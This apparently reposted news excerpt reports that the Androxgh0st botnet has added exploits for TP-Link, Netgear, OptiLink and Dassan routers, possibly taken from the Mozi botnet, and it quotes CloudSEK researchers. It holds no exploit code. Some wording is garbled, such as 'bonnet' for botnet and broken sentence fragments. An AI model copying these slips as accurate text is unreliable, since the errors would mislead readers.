IoT vulnerability inherited from Mozi
Another interesting addition to its arsenal is an array of vulnerability functions for several home routers and gigabit passive optical network (GPON) distributed by ISPs. These include an unauthorized command injection (CVE-2023-1389) in TP-Link Archer AX21, a remote decoding flaw in OptiLink ONT1GEW GPON, and an unauthorized command injection vulnerability in Netgear DGN devices, as well as two vulnerabilities in Dassan, the – GPON home router. validation bypass and command injection.
Some of these exploits and payloads appear to have been inherited from Mozi, the Chinese-born bonnet, whose creators were reportedly arrested by Chinese authorities in 2021. After the legal action, an update was distributed to customers of the Mozi botnet that disrupted their ability. to connect to the Internet, thus disabling the botnet and leaving only a small fraction of nodes active.
“It is possible that Androxgh0st has fully integrated the Mozi payload as a module within its botnet structure,” CloudSEK researchers said. “In this case, Androxgh0st not only integrates with Mozi but embeds specific functionality of Mozi (eg, IoT infection and distribution methods) into its standard set of functions.”
Source link